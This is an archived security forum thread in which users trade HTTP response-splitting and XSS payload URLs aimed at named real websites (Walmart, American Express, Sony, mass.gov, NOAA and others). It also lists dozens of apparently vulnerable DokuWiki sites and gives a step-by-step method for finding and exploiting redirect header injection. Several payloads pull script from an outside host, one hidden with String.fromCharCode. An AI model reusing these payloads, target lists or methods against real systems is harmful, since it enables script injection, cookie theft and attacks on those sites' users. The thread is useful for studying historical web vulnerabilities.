Feeding directly from the redirects thread, as I find them I'll post them here, because it doesn't really make sense in the redirects thread even though that's the idea behind why you'd do this in the first place:

http://www.dataplace.org/redir.html?url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

As a side note it seems like there'd be a way to use this to steal HTTP Only cookies as well as long as the Set-Cookie directive were below the Location header.

- RSnake
Gotta love it. http://ha.ckers.org

Also pulled from Maluc's redirect list: http://www.topix.net/redir/loc=prss-myway/%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Last one from Maluc's list: http://www.mass.gov/portal/url-trx.jsp?MGTitle=&url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com

- RSnake
Gotta love it. http://ha.ckers.org

That last one opens as a download in Opera. Interesting.

- Kyran

opera is more strict RFC. Com'on, are we @ckers?
use %0d%0a instead of %0a or %0a%0a, and test again.

Yup... it was just a proof of concept... hardly polished.

- RSnake
Gotta love it. http://ha.ckers.org

http://www.sony.com/SonySearch/ClickThrough?target=%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&term=blah&topicname=%2FHome&origin=www.sony.com&pagenum=1

- RSnake
Gotta love it. http://ha.ckers.org

From Maluc's list: http://www.brasilecodiesel.com.br/links/index.php?redir=le&acai3_cod=314228&url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Edit: Removed. not actual response splitting, just XSS.

-maluc



Edited 1 time(s). Last edit at 10/14/2006 11:43AM by maluc.

54 Header-Based-Redirrection XSS-Afflicted Sites! I could post this in 3 different threads too, but because I'm nice, and lazy, I won't!
Edit: By 101, I really meant 54...

[docs.blacktree.com]
[wiki.splitbrain.org]
[www.osflash.org]
[www.ehl.lu.se]
[grid.pd.infn.it]
[www.d-dome.net]
[www.brest-wireless.net]
[geofs.uni-muenster.de]
[www.sgal.org]
[www.mmto.org]
[www.linearcollider.org]
[www.di.unipi.it]
[www.bamberg-gewinnt.de]
[www.doc.ic.ac.uk]
[www.towersoft.com.au]
[middleware.georgetown.edu]
[docs.hr-xml.org]
[developer.axis.com]
[grid.bifi.unizar.es]
[fibr.kgi.edu]
[flr-project.org]
[www.ifa.hawaii.edu]
[dream.sims.berkeley.edu]
[honiden-lab.ex.nii.ac.jp]
[theory.sinp.msu.ru]
[wiki.nodalpoint.org]
[tweetypie.doc.ic.ac.uk]
[grid.sinp.msu.ru]
[www.lensbabies.com]
[www.topic-maps.org]
[www.escrowagent.com.au]
[www.anci.ch]
[www.assistech.org.uk]
[webserverx.arts.ccny.cuny.edu]
[oranchak.com]
[theory.sinp.msu.ru]
[www.jive.nl]
[fubica.lsd.ufcg.edu.br]
[www.iitis.gliwice.pl]
[www.astron.nl]
[www.jive.nl]
[lug.uwcs.co.uk]
[cent.uji.es]
[www.hci.iastate.edu]
[decision.csl.uiuc.edu]
[www.wv.inf.tu-dresden.de]
[www.vscp.org]
[www.lug-ag.ch]
[itgroup.mpiwg-berlin.mpg.de]
[wiki.uiah.fi]
[www.smarthouse.duke.edu]
[wiki.ssl.ull.es]
[macaroni.as.arizona.edu]
[www.mozart-oz.org]



Edited 1 time(s). Last edit at 10/02/2006 10:50PM by unsticky.

if you didn't test them, where were they from? or a google dork?

Edit: nevermind, the link names answered that question .. and alot don't work, although the berkeley one did ^^

-maluc



Edited 1 time(s). Last edit at 10/02/2006 10:27PM by maluc.

I'm workin' on it, I'm going through them now. And in a way, yes, a google dork. but... but... I found an exploit, and then googled for sites running the software... That makes me atleast a step above a normal google dork.

indeed it does, so guud job for that.. ^^

i'm assuming by the link names that dokuwiki is the culprit?

-maluc

Open source website applications strike again! Knowing what software will be vulnerable is key to finding issues. This is exactly how a full scale XSS worm could work in theory. Nice find unsticky. Even if only half of them work, that's still a huge success ratio for a single search. Imagine if it were in PHP nuke... thousands of sites would be vulnerable... maybe tens of thousands.

- RSnake
Gotta love it. http://ha.ckers.org

Yup, DokuWiki is indeed the culprit, and I already emailed the creator(s) of the software. According to google, ~13,800 sites run DokuWiki, and if the trend of 54/101 results are actually vulnerable continues, then that leaves something in the ballpark of 7300.



Edited 1 time(s). Last edit at 10/03/2006 01:43AM by unsticky.

well there's no telling how many of those are duplicate domains..

but in any case, it's alot of vulnerable sites.

-maluc



Edited 1 time(s). Last edit at 10/03/2006 01:29AM by maluc.

http://yellowpages.com/sp/exittracking/?path=http://%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E

doesn't work in IE though..

-maluc

http://www.switchboard.com/bin/cgiredir.dll?ID=515&URL=http://%0d%0a%0d%0a%3Cbody%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,32,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,97,46,99,107,101,114,115,46,111,114,103,47,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41));alert(%22location.host%20is:%20%22%2Blocation.host);%3C%2Fscript%3E

Also does not work in IE/opera .. is it because only firefox outputs response errors?

-maluc

I've never gotten HTTP Response Splitting to work in IE. I think it's because, in Firefox, the last HTTP response code takes precidence, whereas in IE, it's the first.



Edited 2 time(s). Last edit at 10/14/2006 01:55PM by yawnmoth.

ya, none of these work in IE .. except for the randolph.af.mil one.. which i'll be relocating because it's not actually responce splitting

just meta injection _-_

-maluc

got one http://www.regnow.com/softsell/visitor.cgi?affiliate=14776&action=site&vendor=8527&ref=http://%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
other http://oceanservice.noaa.gov/cgi-bin/redir.cgi?url=%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
even other http://www.puretna.com/redir.php?url=%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

these are easily found through google dork (following maluc's method and making some adjustments in it)

also ty rsnake for those 3 vectors for HTTP Response splitting.

challenge: can someone find the right vector for this page (just curious cause this as a weird system)? http://www.fxpsc.co.jp/cgi-bin/redir.cgi?url=



Edited 3 time(s). Last edit at 10/20/2006 06:53PM by nrg.

from broken's redirect: http://www.walmart.com/third_party_redirector.gsp?vendor=GE&service=CREDITAPP&url=http://%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E

-maluc

*scratches head*
I think I got some reading to do ...
I think I will start with this ha.ckers.org

btw thanks maluc for this and neoseeker.com xss.

Yeah, i don't understand much about detecting response splitting myself.. i just try all the methods used in this thread so far, and see if they work.

what i'd really like to know, that someone like rsnake/unsticky might be able to explain.. is there certain clues in the responses seen by Live HTTPHeaders or burp proxy as to which method will work?

for example, a response that cuts off after the first colon:

HTTP/1.x 302 Moved Temporarily
Date: Sat, 18 Nov 2006 23:14:41 GMT
Server: Apache-Coyote/1.1
Location: content-type:
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

(injection: %0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
)

does that give any clues? or do you guys follow a similar spray-n-pray approach

basically just, what's your typical flowchart look like

-maluc

I am just looking thru Amit Klein's whitepaper_httpresponse.pdf.
and not really seeing no sure fire way to spot them ??
Could be that I am sleepy tho ?

Anywho found one at aol.com

Aol.com

Redirect was found by benn_0_

./br0ken

I guess here's my methodology. It's a pain but it works.

For redirection response splitting:
1) locate a redirect on the site in question. Most big sites have them so this isn't that uncommon. I use my own custom script for locating them but I actually find them just as often by manual inspection.
2) See what kind of redirect it is by slowing it down with burp proxy with all server responses turned on (turn off the text bullet).
3) If it's a META it's not vulnerable (may be to XSS but not to response splitting). Same with JavaScript redirection. If it's 301, 302 or 304, chances are it's vulnerable.
4) Next replace the "http://www.whatever...." with "%0A%0Dhttp://www.whatever...." and hit the redirection again. If you see that it's changed the output from the %0A%0D to an actual newline/carriage return there is a very high probability that it's vulnerable.
5) Lastly try a full header injection with something like %0AContent-Type:html%0A%0A<script>alert("XSS")</script>

There may be some reasons some of the characters aren't allowed so your mileage may vary, but that's the general route I take for redirection. Cookies or other headers have their own methods. Ultimately it's just a pain, but you can short circuit the whole process by just jumping from line 2 to 5 and watching the output to see what happens.

- RSnake
Gotta love it. http://ha.ckers.org

thanks, i never gave burp proxy a try for it.. but it's way better than trying to use Live HTTP Headers.. the latter only shows properly formatted headers rather than the raw data stream.

so for those looking to audit response splitting.. definitely use burp proxy. Live HTTP Headers is mostly useless for it :/

from rsnake's redirect list: http://wow.com/redir?src=PTL&clickedItemURN=http://%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

by the way rsnake, there's a typo in the third example of http://ha.ckers.org/response-splitting.html
the > in "body onload=%3Ealert(" is unnecessary

-maluc

Whoops! Thanks, maluc, I fixed that. As you can tell I wrote the examples out by hand. That'll teach me.

- RSnake
Gotta love it. http://ha.ckers.org

heh, no prob..

from malorn's redirect disclosure:

http://www109.americanexpress.com/rightp/ads_redirect.jsp?location=http://%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Dear CERT Webmasters,

Please try to build security in US-CERT.

Love Always,
-maluc

P.S. definitely the most ironic link name for an XSS i've seen